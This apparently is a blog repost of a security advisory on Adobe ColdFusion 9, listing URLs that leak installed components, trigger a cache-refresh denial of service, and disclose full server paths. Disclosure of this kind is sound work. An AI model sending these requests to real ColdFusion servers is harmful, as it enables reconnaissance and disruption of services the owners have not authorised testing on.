Search This Blog

Powered by Blogger.

Blog Archive

Labels

Dos(Denial of Service) and other vulnerability Found in Adobe ColdFusion 9

A security Researcher from websecurit.com.au discovered Denial of Service(DOS),information leakage,Full path disclosure vulnerability in Adobe ColdFusion version 9 and earlier versions.

Vulnerability Details:

Information Leakage (WASC-13):


http://site/CFIDE/componentutils/packagelist.cfm


Leakage of the list of all components installed at the server and paths to
them.

DoS (WASC-10):

http://site/CFIDE/componentutils/packagelist.cfm?refreshCache=yes

At this request the update of components cache occurs, which leads to
overload of the server, if large amount of components is installed.

Full path disclosure (WASC-13):

http://site/CFIDE/adminapi/_datasource/formatjdbcurl.cfm

http://site/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm

http://site/CFIDE/adminapi/_datasource/geturldefaults.cfm

http://site/CFIDE/adminapi/_datasource/setdsn.cfm

http://site/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm

http://site/CFIDE/adminapi/_datasource/setsldatasource.cfm

http://site/CFIDE/adminapi/customtags/l10n.cfm

http://site/CFIDE/debug/cf_debugFr.cfm (in body of page with frames)

There are many other FPD in admin panel of ColdFusion.
Share it:

Application Vulnerability

DDOS Vulnerability

Information Leakage Vulnerability

Vulnerability